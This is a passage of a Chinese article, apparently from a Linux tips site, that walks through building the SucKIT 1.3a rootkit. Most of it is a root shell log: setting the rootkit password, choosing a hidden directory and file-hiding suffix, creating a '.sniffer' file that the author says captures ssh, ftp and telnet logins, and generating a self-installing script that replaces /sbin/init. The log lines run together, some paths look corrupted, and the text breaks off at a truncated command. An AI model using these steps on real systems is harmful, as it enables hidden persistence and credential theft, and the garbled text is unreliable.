suckit后门程序的分析 （二）

【 tulaoshi.com - Linux 】

这篇文章为我早期的时候发表的文章，为什么我要写这个呢？因为这个程序写得太精妙了，我不得不佩服他的隐藏性，非常先进。看看我写的就知道他的精妙之处了！
关于这场攻击与反攻击的文章我随后几天撰写。精彩不容错过！:P
[root@Learning sk-1.3a]#makePlease do `make skconfig` in top level directory to generate configuration file.make: *** [include/config.h] Error 1 (告诉我们不要用make，而是用make skconfig)[root@Learning sk-1.3a]#make skconfigrm -f include/config.h sk login instmake[1]: Entering directory `/root/backdoor/sk-1.3a/src'make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c sha1.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c crypto.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zpass.c sha1.o crypto.o -o passmake[1]: Leaving directory `/root/backdoor/sk-1.3a/src'[===== SucKIT version 1.3a, Jul 26 2004 =====][====== ©oded by sd & devik , 2002 ======]Please enter new rootkit password: （让我们输入密码）Again, just to be sure: （再次输入确认密码）OK, new password set.Home directory [/usr/share/locale/sk/.sk12]: （通过后门进入的缺省目录）Magic file-hiding suffix [sk12]: （sk12后门程序，使用ls –l可以察看到有个.sniffer文件，这个文件是可以窃听到ssh、ftp、telnet等远程登陆的用户名与密码信息,这也正是为何debian服务器接连被黑的事件发生） Configuration saved. （保存配置文件）From now, _only_ this configuration will be used by generatedbinaries till you do skconfig again.To (re)build all of stuff type 'make' （开始执行make命令）[root@Learning sk-1.3a]# makemake[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zlogin.c sha1.o crypto.o -o loginrm -f sk kernel.omake skmake[2]: Entering directory `/root/backdoor/sk-1.3a/src'make[3]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c backdoor.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c client.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c install.cgcc -S -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b kernel.c -o - | grep -vE ".align|.p2align|.text|.data|.rodata|#|.ident|.file|.version" >> kernel.sgcc -c kernel.sgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c kmem.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c lib.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c main.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c pattern.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c printf.cmake[3]: Leaving directory `/root/backdoor/sk-1.3a/src'gcc -s -nostdlib *.o -o skmake[2]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zbin2oct.c -o bin2octmake[1]: Leaving directory `/root/backdoor/sk-1.3a/src'cp -f src/DownloadFileslogin logincp -f src/DownloadFilessk skCreating install scriptecho "#!/bin/bash" > instecho "D=`cat include/config.h | grep HOME | awk {'print '}`" >> instecho "H=`cat include/config.h | grep HIDESTR | awk {'print '}`" >> instecho "mkdir -p $D; cd $D" >> instecho "echo > .sniffer; chmod 0622 .sniffer" >> instecho "echo -n -e `gzip -9 -c sk | src/DownloadFilesbin2oct` | gzip -d > sk" >> instecho "chmod 0755 sk; if [ ! -f /sbin/init$ ]; " "then cp -f /sbin/init /sbin/init$; fi;" "rm -f /sbin/init; cp sk /sbin/init" >> instOkay, file 'inst' is complete, self-installing script. （将inst文件属性为可执行）Just upload it somewhere, execute and you could log in using./DownloadFileslogin binary.Have fun![root@Learning sk-1.3a]#chmod +x inst （将inst文件属性为可执行）[root@Learning sk-1.3a]# ./i